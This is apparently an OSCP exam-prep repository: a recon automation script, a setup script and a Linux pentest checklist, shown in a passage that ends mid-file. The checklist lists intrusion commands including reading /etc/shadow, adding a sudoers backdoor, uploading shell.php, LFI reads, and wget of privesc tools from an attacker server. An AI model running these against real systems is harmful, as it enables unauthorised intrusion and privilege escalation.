[ { "path": "README.md", "content": "# oscp\n\n## Reconscan.py\n\nThis script is based on the script by [Mike Czumak](http://www.securitysift.com/offsec-pwb-oscp/). But it is heavily rewritten, some things have been added, other stuff has been removed. The script is written as a preparation for the OSCP exam. It was never meant to be a general script. So if you want to use it you have to make sure to fix all the hardcoded paths. The script is multithreaded and can be run against several hosts at once.\n\nThe script is invoked like this:\n\n```\npython reconscan.py 192.168.1.101 192.168.1.102 192.168.1.103\n```\n\nOne important thing to note is that I removed the scan for all ports. Because it would sometimes just take to long to run. So make sure you either add that scan or run it afterwards. So you don't miss any ports.\n\nPlease note that the script includes dirb and nikto-scans that are very invasive. The script also includes several nmap-scripts that check for vulnerabilities. So yeah, this script would be pretty illegal and bad to run against a machine you don't have permission to attack.\n\n## Templates\n\nI created two templates that I used as a guide for every machine I attacked. One template is for Linux machines and the other for windows. There are some differences between them. The templates became kind of my checklists. They are divided into three sections: **recon**, **privilege escalation** and **loot**. \n\nThe templates are written in markdown. But I never actually rendered them, so I don't really know how they look like rendered. They are probably pretty messy. I also used them together with markdown syntax-highlightning in my editor, so it became easy to navigate the files.\n\nThe templates have a few keywords in the, like **INSERTIPADDRESS**. These are hooks that are read by reconscan.py, and it insert the target machine IP-address automatically. Some other stuff are also inserted automatically, like the a basic nmap-scan. And nikto-scan.\n\nWherever there are references to a book. This is the book: https://bobloblaw.gitbooks.io/security/content/\n" }, { "path": "recon_enum/reconscan.py", "content": "#!/usr/bin/env python\nimport subprocess\nimport multiprocessing\nfrom multiprocessing import Process, Queue\nimport os\nimport time\nimport fileinput\nimport atexit\nimport sys\nimport socket\nimport re\n\n# Todo:\n# Add mysql nmap-script\n# Change replace to sed:\n# sed 's|literal_pattern|replacement_string|g'\n\nstart = time.time()\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\n# Creates a function for multiprocessing. Several things at once.\ndef multProc(targetin, scanip, port):\n jobs = []\n p = multiprocessing.Process(target=targetin, args=(scanip,port))\n jobs.append(p)\n p.start()\n return\n\ndef connect_to_port(ip_address, port, service):\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((ip_address, int(port)))\n banner = s.recv(1024)\n\n if service == \"ftp\":\n s.send(\"USER anonymous\\r\\n\")\n user = s.recv(1024)\n s.send(\"PASS anonymous\\r\\n\")\n password = s.recv(1024)\n total_communication = banner + \"\\r\\n\" + user + \"\\r\\n\" + password\n write_to_file(ip_address, \"ftp-connect\", total_communication)\n elif service == \"smtp\":\n total_communication = banner + \"\\r\\n\"\n write_to_file(ip_address, \"smtp-connect\", total_communication)\n elif service == \"ssh\":\n total_communication = banner\n write_to_file(ip_address, \"ssh-connect\", total_communication)\n elif service == \"pop3\":\n s.send(\"USER root\\r\\n\")\n user = s.recv(1024)\n s.send(\"PASS root\\r\\n\")\n password = s.recv(1024)\n total_communication = banner + user + password\n write_to_file(ip_address, \"pop3-connect\", total_communication)\n s.close()\n\n\n\n\ndef write_to_file(ip_address, enum_type, data):\n\n file_path_linux = '../reports/%s/mapping-linux.md' % (ip_address)\n file_path_windows = '../reports/%s/mapping-windows.md' % (ip_address)\n paths = [file_path_linux, file_path_windows]\n print bcolors.OKGREEN + \"INFO: Writing \" + enum_type + \" to template files:\\n \" + file_path_linux + \" \\n\" + file_path_windows + bcolors.ENDC\n\n for path in paths:\n if enum_type == \"portscan\":\n subprocess.check_output(\"replace INSERTTCPSCAN \\\"\" + data + \"\\\" -- \" + path, shell=True)\n if enum_type == \"dirb\":\n subprocess.check_output(\"replace INSERTDIRBSCAN \\\"\" + data + \"\\\" -- \" + path, shell=True)\n if enum_type == \"nikto\":\n subprocess.check_output(\"replace INSERTNIKTOSCAN \\\"\" + data + \"\\\" -- \" + path, shell=True)\n if enum_type == \"ftp-connect\":\n subprocess.check_output(\"replace INSERTFTPTEST \\\"\" + data + \"\\\" -- \" + path, shell=True)\n if enum_type == \"smtp-connect\":\n subprocess.check_output(\"replace INSERTSMTPCONNECT \\\"\" + data + \"\\\" -- \" + path, shell=True)\n if enum_type == \"ssh-connect\":\n subprocess.check_output(\"replace INSERTSSHCONNECT \\\"\" + data + \"\\\" -- \" + path, shell=True)\n if enum_type == \"pop3-connect\":\n subprocess.check_output(\"replace INSERTPOP3CONNECT \\\"\" + data + \"\\\" -- \" + path, shell=True)\n if enum_type == \"curl\":\n subprocess.check_output(\"replace INSERTCURLHEADER \\\"\" + data + \"\\\" -- \" + path, shell=True)\n return\n\n\n\ndef dirb(ip_address, port, url_start, wordlist=\"/usr/share/wordlist/dirb/big.txt, /usr/share/wordlist/dirb/vulns/cgis.txt\"):\n print bcolors.HEADER + \"INFO: Starting dirb scan for \" + ip_address + bcolors.ENDC\n DIRBSCAN = \"dirb %s://%s:%s %s -o ../reports/%s/dirb-%s.txt -r\" % (url_start, ip_address, port, ip_address, ip_address, wordlist)\n print bcolors.HEADER + DIRBSCAN + bcolors.ENDC\n results_dirb = subprocess.check_output(DIRBSCAN, shell=True)\n print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with dirb scan for \" + ip_address + bcolors.ENDC\n print results_dirb\n write_to_file(ip_address, \"dirb\", results_dirb)\n return\n\ndef nikto(ip_address, port, url_start):\n print bcolors.HEADER + \"INFO: Starting nikto scan for \" + ip_address + bcolors.ENDC\n NIKTOSCAN = \"nikto -h %s://%s -o ../reports/%s/nikto-%s-%s.txt\" % (url_start, ip_address, ip_address, url_start, ip_address)\n print bcolors.HEADER + NIKTOSCAN + bcolors.ENDC\n results_nikto = subprocess.check_output(NIKTOSCAN, shell=True)\n print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with NIKTO-scan for \" + ip_address + bcolors.ENDC\n print results_nikto\n write_to_file(ip_address, \"nikto\", results_nikto)\n return\n\n\ndef httpEnum(ip_address, port):\n print bcolors.HEADER + \"INFO: Detected http on \" + ip_address + \":\" + port + bcolors.ENDC\n print bcolors.HEADER + \"INFO: Performing nmap web script scan for \" + ip_address + \":\" + port + bcolors.ENDC\n\n dirb_process = multiprocessing.Process(target=dirb, args=(ip_address,port,\"http\"))\n dirb_process.start()\n nikto_process = multiprocessing.Process(target=nikto, args=(ip_address,port,\"http\"))\n nikto_process.start()\n\n CURLSCAN = \"curl -I http://%s\" % (ip_address)\n print bcolors.HEADER + CURLSCAN + bcolors.END\n curl_results = subprocess.check_output(CURLSCAN, shell=True)\n write_to_file(ip_address, \"curl\", curl_results)\n HTTPSCAN = \"nmap -sV -Pn -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,http-git,http-iis-webdav-vuln,http-php-version,http-robots.txt,http-shellshock,http-vuln-cve2015-1635 -oN ../reports/%s/%s_http.nmap %s\" % (port, ip_address, ip_address, ip_address)\n print bcolors.HEADER + HTTPSCAN + bcolors.ENDC\n\n http_results = subprocess.check_output(HTTPSCAN, shell=True)\n print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with HTTP-SCAN for \" + ip_address + bcolors.ENDC\n print http_results\n\n return\n\ndef httpsEnum(ip_address, port):\n print bcolors.HEADER + \"INFO: Detected https on \" + ip_address + \":\" + port + bcolors.ENDC\n print bcolors.HEADER + \"INFO: Performing nmap web script scan for \" + ip_address + \":\" + port + bcolors.ENDC\n\n dirb_process = multiprocessing.Process(target=dirb, args=(ip_address,port,\"https\"))\n dirb_process.start()\n nikto_process = multiprocessing.Process(target=nikto, args=(ip_address,port,\"https\"))\n nikto_process.start()\n\n SSLSCAN = \"sslscan %s:%s >> ../reports/%s/ssl_scan_%s\" % (ip_address, port, ip_address, ip_address)\n print bcolors.HEADER + SSLSCAN + bcolors.ENDC\n ssl_results = subprocess.check_output(SSLSCAN, shell=True)\n print bcolors.OKGREEN + \"INFO: CHECK FILE - Finished with SSLSCAN for \" + ip_address + bcolors.ENDC\n\n HTTPSCANS = \"nmap -sV -Pn -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,http-git,http-iis-webdav-vuln,http-php-version,http-robots.txt,http-shellshock,http-vuln-cve2015-1635 -oN ../reports/%s/%s_http.nmap %s\" % (port, ip_address, ip_address, ip_address)\n print bcolors.HEADER + HTTPSCANS + bcolors.ENDC\n https_results = subprocess.check_output(HTTPSCANS, shell=True)\n print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with HTTPS-scan for \" + ip_address + bcolors.ENDC\n print https_results\n return\n\ndef mssqlEnum(ip_address, port):\n print bcolors.HEADER + \"INFO: Detected MS-SQL on \" + ip_address + \":\" + port + bcolors.ENDC\n print bcolors.HEADER + \"INFO: Performing nmap mssql script scan for \" + ip_address + \":\" + port + bcolors.ENDC\n MSSQLSCAN = \"nmap -sV -Pn -p %s --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes,mysql-empty-password,mysql-brute,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 --script-args=mssql.instance-port=1433,mssql.username=sa,mssql.password=sa -oN ../reports/%s/mssql_%s.nmap %s\" % (port, ip_address, ip_address)\n print bcolors.HEADER + MSSQLSCAN + bcolors.ENDC\n mssql_results = subprocess.check_output(MSSQLSCAN, shell=True)\n print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with MSSQL-scan for \" + ip_address + bcolors.ENDC\n print mssql_results\n return\n\n\ndef smtpEnum(ip_address, port):\n print bcolors.HEADER + \"INFO: Detected smtp on \" + ip_address + \":\" + port + bcolors.ENDC\n connect_to_port(ip_address, port, \"smtp\")\n SMTPSCAN = \"nmap -sV -Pn -p %s --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 %s -oN ../reports/%s/smtp_%s.nmap\" % (port, ip_address, ip_address, ip_address)\n print bcolors.HEADER + SMTPSCAN + bcolors.ENDC\n smtp_results = subprocess.check_output(SMTPSCAN, shell=True)\n print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with SMTP-scan for \" + ip_address + bcolors.ENDC\n print smtp_results\n # write_to_file(ip_address, \"smtp\", smtp_results)\n return\n\ndef smbNmap(ip_address, port):\n print \"INFO: Detected SMB on \" + ip_address + \":\" + port\n smbNmap = \"nmap --script=smb-enum-shares,smb-ls,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos %s -oN ../reports/%s/smb_%s.nmap\" % (ip_address, ip_address, ip_address)\n smbNmap_results = subprocess.check_output(smbNmap, shell=True)\n print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with SMB-Nmap-scan for \" + ip_address + bcolors.ENDC\n print smbNmap_results\n return\n\ndef smbEnum(ip_address, port):\n print \"INFO: Detected SMB on \" + ip_address + \":\" + port\n enum4linux = \"enum4linux -a %s > ../reports/%s/enum4linux_%s 2>/dev/null\" % (ip_address, ip_address, ip_address)\n enum4linux_results = subprocess.check_output(enum4linux, shell=True)\n print bcolors.OKGREEN + \"INFO: CHECK FILE - Finished with ENUM4LINUX-Nmap-scan for \" + ip_address + bcolors.ENDC\n print enum4linux_results\n return\n\ndef ftpEnum(ip_address, port):\n print bcolors.HEADER + \"INFO: Detected ftp on \" + ip_address + \":\" + port + bcolors.ENDC\n connect_to_port(ip_address, port, \"ftp\")\n FTPSCAN = \"nmap -sV -Pn -p %s --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oN '../reports/%s/ftp_%s.nmap' %s\" % (port, ip_address, ip_address, ip_address)\n print bcolors.HEADER + FTPSCAN + bcolors.ENDC\n results_ftp = subprocess.check_output(FTPSCAN, shell=True)\n print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with FTP-Nmap-scan for \" + ip_address + bcolors.ENDC\n print results_ftp\n return\n\ndef udpScan(ip_address):\n print bcolors.HEADER + \"INFO: Detected UDP on \" + ip_address + bcolors.ENDC\n UDPSCAN = \"nmap -Pn -A -sC -sU -T 3 --top-ports 200 -oN '../reports/%s/udp_%s.nmap' %s\" % (ip_address, ip_address, ip_address)\n print bcolors.HEADER + UDPSCAN + bcolors.ENDC\n udpscan_results = subprocess.check_output(UDPSCAN, shell=True)\n print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with UDP-Nmap scan for \" + ip_address + bcolors.ENDC\n print udpscan_results\n UNICORNSCAN = \"unicornscan -mU -I %s > ../reports/%s/unicorn_udp_%s.txt\" % (ip_address, ip_address, ip_address)\n unicornscan_results = subprocess.check_output(UNICORNSCAN, shell=True)\n print bcolors.OKGREEN + \"INFO: CHECK FILE - Finished with UNICORNSCAN for \" + ip_address + bcolors.ENDC\n\ndef sshScan(ip_address, port):\n print bcolors.HEADER + \"INFO: Detected SSH on \" + ip_address + \":\" + port + bcolors.ENDC\n connect_to_port(ip_address, port, \"ssh\")\n SSHSCAN = \"nmap -sV -Pn -p %s --script=ssh-auth-methods,ssh-hostkey,ssh-run,sshv1 -oN '../reports/%s/ssh_%s.nmap' %s\" % (port, ip_address, ip_address, ip_address)\n print bcolors.HEADER + SSHSCAN + bcolors.ENDC\n results_ssh = subprocess.check_output(SSHSCAN, shell=True)\n print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with SSH-Nmap-scan for \" + ip_address + bcolors.ENDC\n print results_ssh\n return\n\ndef pop3Scan(ip_address, port):\n print bcolors.HEADER + \"INFO: Detected POP3 on \" + ip_address + \":\" + port + bcolors.ENDC\n connect_to_port(ip_address, port, \"pop3\")\n POP3SCAN = \"nmap -sV -Pn -p %s --script=pop3-brute,pop3-capabilities,pop3-ntlm-info -oN '../reports/%s/pop3_%s.nmap' %s\" % (port, ip_address, ip_address, ip_address)\n print bcolors.HEADER + SSHSCAN + bcolors.ENDC\n results_pop3 = subprocess.check_output(POP3SCAN, shell=True)\n print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with POP3-Nmap-scan for \" + ip_address + bcolors.ENDC\n print results_pop3\n return\n\n\ndef nmapScan(ip_address):\n ip_address = ip_address.strip()\n print bcolors.OKGREEN + \"INFO: Running general TCP/UDP nmap scans for \" + ip_address + bcolors.ENDC\n\n\n TCPSCAN = \"nmap -sV -O %s -oN '../reports/%s/%s.nmap'\" % (ip_address, ip_address, ip_address)\n print bcolors.HEADER + TCPSCAN + bcolors.ENDC\n results = subprocess.check_output(TCPSCAN, shell=True)\n print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with BASIC Nmap-scan for \" + ip_address + bcolors.ENDC\n print results\n\n p = multiprocessing.Process(target=udpScan, args=(scanip,))\n p.start()\n\n write_to_file(ip_address, \"portscan\", results)\n lines = results.split(\"\\n\")\n serv_dict = {}\n for line in lines:\n ports = []\n line = line.strip()\n if (\"tcp\" in line) and (\"open\" in line) and not (\"Discovered\" in line):\n # print line\n while \" \" in line:\n line = line.replace(\" \", \" \");\n linesplit= line.split(\" \")\n service = linesplit[2] # grab the service name\n\n port = line.split(\" \")[0] # grab the port/proto\n # print port\n if service in serv_dict:\n ports = serv_dict[service] # if the service is already in the dict, grab the port list\n\n ports.append(port)\n # print ports\n serv_dict[service] = ports # add service to the dictionary along with the associated port(2)\n\n\n\n # go through the service dictionary to call additional targeted enumeration functions\n for serv in serv_dict:\n ports = serv_dict[serv]\n if re.search(r\"http[^s]\", serv):\n for port in ports:\n port = port.split(\"/\")[0]\n multProc(httpEnum, ip_address, port)\n elif re.search(r\"https|ssl\", serv):\n for port in ports:\n port = port.split(\"/\")[0]\n multProc(httpsEnum, ip_address, port)\n elif \"smtp\" in serv:\n for port in ports:\n port = port.split(\"/\")[0]\n multProc(smtpEnum, ip_address, port)\n elif \"ftp\" in serv:\n for port in ports:\n port = port.split(\"/\")[0]\n multProc(ftpEnum, ip_address, port)\n elif (\"microsoft-ds\" in serv) or (\"netbios-ssn\" == serv):\n for port in ports:\n port = port.split(\"/\")[0]\n multProc(smbEnum, ip_address, port)\n multProc(smbNmap, ip_address, port)\n elif \"ms-sql\" in serv:\n for port in ports:\n port = port.split(\"/\")[0]\n multProc(mssqlEnum, ip_address, port)\n elif \"ssh\" in serv:\n for port in ports:\n port = port.split(\"/\")[0]\n multProc(sshScan, ip_address, port)\n elif \"snmp\" in serv:\n for port in ports:\n port = port.split(\"/\")[0]\n multProc(snmpEnum, ip_address, port)\n\n return\n\n\nprint bcolors.HEADER\nprint \"------------------------------------------------------------\"\nprint \"!!!! RECON SCAN !!!!!\"\nprint \"!!!! A multi-process service scanner !!!!!\"\nprint \"!!!! dirb, nikto, ftp, ssh, mssql, pop3, tcp !!!!!\"\nprint \"!!!! udp, smtp, smb !!!!!\"\nprint \"------------------------------------------------------------\"\n\n\n\nif len(sys.argv) < 2:\n print \"\"\n print \"Usage: python reconscan.py \"\n print \"Example: python reconscan.py 192.168.1.101 192.168.1.102\"\n print \"\"\n print \"############################################################\"\n pass\n sys.exit()\n\nprint bcolors.ENDC\n\nif __name__=='__main__':\n\n # Setting ip targets\n targets = sys.argv\n targets.pop(0)\n\n dirs = os.listdir(\"../reports/\")\n for scanip in targets:\n scanip = scanip.rstrip()\n if not scanip in dirs:\n print bcolors.HEADER + \"INFO: No folder was found for \" + scanip + \". Setting up folder.\" + bcolors.ENDC\n subprocess.check_output(\"mkdir ../reports/\" + scanip, shell=True)\n subprocess.check_output(\"mkdir ../reports/\" + scanip + \"/exploits\", shell=True)\n subprocess.check_output(\"mkdir ../reports/\" + scanip + \"/privesc\", shell=True)\n print bcolors.OKGREEN + \"INFO: Folder created here: \" + \"../reports/\" + scanip + bcolors.ENDC\n subprocess.check_output(\"cp ../templates/windows-template.md ../reports/\" + scanip + \"/mapping-windows.md\", shell=True)\n subprocess.check_output(\"cp ../templates/linux-template.md ../reports/\" + scanip + \"/mapping-linux.md\", shell=True)\n print bcolors.OKGREEN + \"INFO: Added pentesting templates: \" + \"../reports/\" + scanip + bcolors.ENDC\n subprocess.check_output(\"sed -i -e 's/INSERTIPADDRESS/\" + scanip + \"/g' ../reports/\" + scanip + \"/mapping-windows.md\", shell=True)\n subprocess.check_output(\"sed -i -e 's/INSERTIPADDRESS/\" + scanip + \"/g' ../reports/\" + scanip + \"/mapping-linux.md\", shell=True)\n\n\n\n p = multiprocessing.Process(target=nmapScan, args=(scanip,))\n p.start()\n" }, { "path": "reports/reports.txt", "content": "" }, { "path": "setup.sh", "content": "#!/bin/bash\n\nfolder=$(find /home /usr /var /tmp /opt /mnt /root -type d -name recon_enum -print -quit 2>/dev/null)\necho -e '#!/bin/bash\\n' > /usr/bin/reconscan\necho -e \"cd $folder && python reconscan.py \\\"\\$@\\\" \\n\" >> /usr/bin/reconscan\nchmod +x /usr/bin/reconscan\n\n" }, { "path": "templates/linux-template.md", "content": "## Info-sheet\n\n- DNS-Domain name:\n- Host name:\n- OS:\n- Server:\n- Kernel:\n- Workgroup:\n- Windows domain:\n\nServices and ports:\nINSERTTCPSCAN\n\n## Recon\n\n\n```\nAlways start with a stealthy scan to avoid closing ports.\n\n# Syn-scan\nnmap -sS INSERTIPADDRESS\n\n# Scan all ports, might take a while.\nnmap INSERTIPADDRESS -p-\n\n# Service-version, default scripts, OS:\nnmap INSERTIPADDRESS -sV -sC -O -p 111,222,333\n\n# Scan for UDP\nnmap INSERTIPADDRESS -sU\nunicornscan -mU -v -I INSERTIPADDRESS\n\n# Connect to udp if one is open\nnc -u INSERTIPADDRESS 48772\n\n# Monster scan\nnmap INSERTIPADDRESS -p- -A -T4 -sC\n```\n\n\n### Port 21 - FTP\n\n- FTP-Name:\n- FTP-version:\n- Anonymous login:\n\nINSERTFTPTEST\n\n\n```\nnmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS\n```\n\n### Port 22 - SSH\n\n- Name:\n- Version:\n- Takes-password:\n- If you have usernames test login with username:username\n\nINSERTSSHCONNECT\n\n```\nnc INSERTIPADDRESS 22\n```\n\n### Port 25\n\n- Name:\n- Version:\n- VRFY:\n\nINSERTSMTPCONNECT\n\n\n```\nnc -nvv INSERTIPADDRESS 25\nHELO foo\n\ntelnet INSERTIPADDRESS 25\nVRFY root\n\nnmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS\n```\n\n### Port 69 - UDP - TFTP\n\nThis is used for tftp-server.\n\n\n### Port 110 - Pop3\n\n- Name:\n- Version:\n\nINSERTPOP3CONNECT\n\n```\ntelnet INSERTIPADDRESS 110\nUSER pelle@INSERTIPADDRESS\nPASS admin\n\nor:\n\nUSER pelle\nPASS admin\n\n# List all emails\nlist\n\n# Retrieve email number 5, for example\nretr 9\n```\n\n### Port 111 - Rpcbind\n\n```\nrpcinfo -p INSERTIPADDRESS\n```\n\n\n### Port 135 - MSRPC\n\nSome versions are vulnerable.\n\n### Port 143 - Imap\n\n### Port 139/445 - SMB\n\n- Name:\n- Version:\n- Domain/workgroup name:\n- Domain-sid:\n- Allows unauthenticated login:\n\n\n```\nnmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445\n\n\nenum4linux -a INSERTIPADDRESS\nrpcclient -U \"\" INSERTIPADDRESS\n\tsrvinfo\n\tenumdomusers\n\tgetdompwinfo\n\tquerydominfo\n\tnetshareenum\n\tnetshareenumall\n\nsmbclient -L INSERTIPADDRESS\nsmbclient //INSERTIPADDRESS/tmp\nsmbclient \\\\\\\\INSERTIPADDRESS\\\\ipc$ -U john\nsmbclient //INSERTIPADDRESS/ipc$ -U john \n```\n\n\n### Port 161/162 UDP - SNMP\n\n```\nnmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS\nsnmp-check -t INSERTIPADDRESS -c public\n```\n\n```\n# Common community strings\npublic\nprivate\ncommunity\n```\n\n\n### Port 554 - RTSP\n\n\n### Port 1030/1032/1033/1038\n\nUsed by RPC to connect in domain network.\n\n## Port 1521 - Oracle\n\n- Name:\n- Version:\n- Password protected:\n\n```\ntnscmd10g version -h INSERTIPADDRESS\ntnscmd10g status -h INSERTIPADDRESS\n```\n\n### Port 2049 - NFS\n\n```\nshowmount -e INSERTIPADDRESS\n\nIf you find anything you can mount it like this:\n\nmount INSERTIPADDRESS:/ /tmp/NFS\nmount -t INSERTIPADDRESS:/ /tmp/NFS\n```\n\n### Port 2100 - Oracle XML DB\n\n- Name:\n- Version:\n- Default logins:\n\n```\nsys:sys\nscott:tiger\n```\n\nDefault passwords\nhttps://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm\n\n\n### 3306 - MySQL\n\n- Name:\n- Version:\n\n```\nnmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse INSERTIPADDRESS -p 3306\n\nmysql --host=INSERTIPADDRESS -u root -p\n```\n\n### Port 3339 - Oracle web interface\n\n\n- Basic info about web service (apache, nginx, IIS)\n- Server:\n- Scripting language:\n- Apache Modules:\n- IP-address:\n\n### Port 80 - Web server\n\n- Server:\n- Scripting language:\n- Apache Modules:\n- IP-address:\n- Domain-name address:\n\n\nINSERTCURLHEADER\n\n- Web application (ex, wordpress, joomla, phpmyadmin)\n- Name:\n- Version:\n- Admin-login:\n\n\n```\n# Nikto\nnikto -h http://INSERTIPADDRESS\n\n# Nikto with squid proxy\nnikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444\n\n# CMS Explorer\ncms-explorer -url http://INSERTIPADDRESS -type [Drupal, WordPress, Joomla, Mambo]\n\n# WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users)\nwpscan --url http://INSERTIPADDRESS\nwpscan --url http://INSERTIPADDRESS --enumerate vp\nwpscan --url http://INSERTIPADDRESS --enumerate vt\nwpscan --url http://INSERTIPADDRESS --enumerate u\n\n# Joomscan\njoomscan -u http://INSERTIPADDRESS \njoomscan -u http://INSERTIPADDRESS --enumerate-components\n\n# Get header\ncurl -i INSERTIPADDRESS\n\n# Get everything\ncurl -i -L INSERTIPADDRESS\n\n# Check for title and all links\ncurl INSERTIPADDRESS -s -L | grep \"title\\|href\" | sed -e 's/^[[:space:]]*//'\n\n# Look at page with just text\ncurl INSERTIPADDRESS -s -L | html2text -width '99' | uniq\n\n# Check if it is possible to upload\ncurl -v -X OPTIONS http://INSERTIPADDRESS/\ncurl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php\n\ndotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix\n```\n\n#### Nikto scan\n\n\nINSERTNIKTOSCAN\n\n\n#### Url brute force\n\n```\n# Not recursive\ndirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt\n\n# Gobuster - remove relevant responde codes (403 for example)\ngobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e\n```\n\nINSERTDIRBSCAN\n\n\n#### Default/Weak login\n\nSearch documentation for default passwords and test them\n\n```\nsite:webapplication.com password\n```\n\n```\nadmin admin\nadmin password\nadmin \nadmin \nroot root\nroot admin\nroot password\nroot \n password\n admin\n username\nusername \n```\n\n\n#### LFI/RFI\n\n\n\n\n```\nfimap -u \"http://INSERTIPADDRESS/example.php?test=\"\n\n# Ordered output\ncurl -s http://INSERTIPADDRESS/gallery.php?page=/etc/passwd\n/root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page=\n```\n\n#### SQL-Injection\n\n```\n# Post\n./sqlmap.py -r search-test.txt -p tfUPass\n\n# Get\nsqlmap -u \"http://INSERTIPADDRESS/index.php?id=1\" --dbms=mysql\n\n# Crawl\nsqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3\n```\n\n#### Sql-login-bypass\n\n- Open Burp-suite\n- Make and intercept a request\n- Send to intruder\n- Cluster attack.\n- Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html)\n- Attack\n- Check for response length variation\n\n\n### Password brute force - last resort\n\n```\ncewl\n```\n\n### Port 443 - HTTPS\n\nHeartbleed:\n\n```\n# Heartbleed\nsslscan INSERTIPADDRESS:443\n```\n\n## Vulnerability analysis\n\nNow we have gathered information about the system. Now comes the part where we look for exploits and vulnerabilites and features.\n\n### To try - List of possibilies\nAdd possible exploits here:\n\n\n\n### Find sploits - Searchsploit and google\n\nWhere there are many exploits for a software, use google. It will automatically sort it by popularity.\n\n```\nsite:exploit-db.com apache 2.4.7\n\n# Remove dos-exploits\n\nsearchsploit Apache 2.4.7 | grep -v '/dos/'\nsearchsploit Apache | grep -v '/dos/' | grep -vi \"tomcat\"\n\n# Only search the title (exclude the path), add the -t\nsearchsploit -t Apache | grep -v '/dos/'\n```\n\n\n\n----------------------------------------------------------------------------\n\n\n\n'''''''''''''''''''''''''''''''''' PRIVESC '''''''''''''''''''''''''''''''''\n\n\n\n-----------------------------------------------------------------------------\n\n\n\n## Privilege escalation\n\nNow we start the whole enumeration-process over gain.\n\n- Kernel exploits\n- Programs running as root\n- Installed software\n- Weak/reused/plaintext passwords\n- Inside service\n- Suid misconfiguration\n- World writable scripts invoked by root\n- Unmounted filesystems\n\nLess likely\n\n- Private ssh keys\n- Bad path configuration\n- Cronjobs\n\n\n### To-try list\n\nHere you will add all possible leads. What to try.\n\n\n### Useful commands\n\n```\n# Spawning shell\npython -c 'import pty; pty.spawn(\"/bin/sh\")'\n\n# Access to more binaries\nexport PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\n\n# Set up webserver\ncd /root/oscp/useful-tools/privesc/linux/privesc-scripts; python -m SimpleHTTPServer 8080\n\n# Download all files\nwget http://192.168.1.101:8080/ -r; mv 192.168.1.101:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linprivchecker.py unix-privesc-check\n\n./LinEnum.sh -t -k password -r LinEnum.txt\npython linprivchecker.py extended\n./unix-privesc-check standard\n\n\n# Writable directories\n/tmp\n/var/tmp\n\n\n# Add user to sudoers\necho \"hacker ALL=(ALL:ALL) ALL\" >> /etc/sudoers\n```\n\n\n### Basic info\n\n- OS:\n- Version:\n- Kernel version:\n- Architecture:\n- Current user:\n\n**Devtools:**\n- GCC:\n- NC:\n- WGET:\n\n**Users with login:**\n\n```\nuname -a\nenv\nid\ncat /proc/version\ncat /etc/issue\ncat /etc/passwd\ncat /etc/group\ncat /etc/shadow\ncat /etc/hosts\n\n# Users with login\ngrep -vE \"nologin\" /etc/passwd\n\n# Priv Enumeration Scripts\n\n\nupload /unix-privesc-check\nupload /root/Desktop/Backup/Tools/Linux_privesc_tools/linuxprivchecker.py ./\nupload 